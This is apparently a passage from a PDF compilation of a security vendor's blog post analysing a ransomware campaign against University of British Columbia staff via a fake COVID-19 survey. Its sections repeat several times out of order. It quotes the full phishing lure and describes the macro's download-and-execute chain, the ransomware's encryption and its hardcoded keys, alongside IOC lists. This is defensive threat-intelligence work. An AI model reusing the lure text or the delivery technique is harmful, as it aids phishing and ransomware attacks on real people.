use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 684 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 685 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 686 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 687 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 688 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 689 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 690 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 691 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 692 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 693 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 694 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 695 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 696 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 697 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 698 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 699 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 700 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 701 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 702 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 703 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 704 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 705 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 706 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 707 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 708 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 709 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 710 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 711 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 712 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 713 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 714 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 715 of 3467\n\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 716 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 717 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 718 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit 